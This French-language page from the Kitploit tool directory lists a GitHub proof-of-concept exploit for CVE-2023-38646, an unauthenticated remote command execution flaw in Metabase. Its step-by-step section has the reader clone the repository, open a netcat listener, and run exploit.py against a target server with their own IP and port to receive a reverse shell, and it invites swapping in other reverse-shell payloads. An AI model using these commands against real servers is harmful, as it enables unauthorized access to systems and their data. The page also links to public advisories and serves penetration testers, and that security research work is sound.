Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-38646 — Ceci est un script de preuve de concept (PoC) pour exploiter Metabase, un outil open-source de business intelligence et d'analyse de données. | Kitploit
Outils/GitHubGitHub/threathntr/cve-2023-38646
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubthreathntr/cve-2023-38646

CVE-2023-38646

Ceci est un script de preuve de concept (PoC) pour exploiter Metabase, un outil open-source de business intelligence et d'analyse de données.

Voir le dépôt
111il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-38646 PoC

Description

Ceci est un script de preuve de concept (PoC) pour exploiter Metabase, un outil open-source de business intelligence et d'analyse de données. Metabase permet aux utilisateurs de visualiser et d'interagir avec leurs données, ce qui en fait une plateforme puissante pour l'analyse de données.

Cette vulnérabilité, désignée sous le nom de CVE-2023-38646, permettait aux attaquants d'exécuter des commandes arbitraires sur le serveur sans nécessiter d'authentification. L'impact de cette faille était grave, car elle accordait un accès non autorisé au serveur au niveau de privilège du serveur.

Étapes de la preuve de concept (PoC)

Clonez ce dépôt

root@kitploit:~
git clone https://github.com/threatHNTR/CVE-2023-38646.git

Accédez au dépôt

root@kitploit:~
cd CVE-2023-38646

Avant d'exécuter le script, configurez un écouteur Netcat

root@kitploit:~
nc -nlvp port-choisi

Exécutez le script

root@kitploit:~
python3 exploit.py -u http://serveur-metabase-cible -i votre-adresse-ip -p port-choisi

Exploitation : Le script tentera d'envoyer un reverse shell au serveur Metabase cible. En cas de succès, vous recevrez un shell sur votre machine. N'hésitez pas à modifier le payload pour essayer différents reverse shells.

Références

  • Avis GitHub : https://github.com/advisories/GHSA-jg32-8h6w-x7vg

  • Avis Metabase : https://www.metabase.com/blog/security-advisory

  • GitHub Metabase : https://github.com/metabase/metabase

  • Blog Assetnote – Enchaîner pour une RCE pré-authentification dans Metabase : https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Télécharger l’outil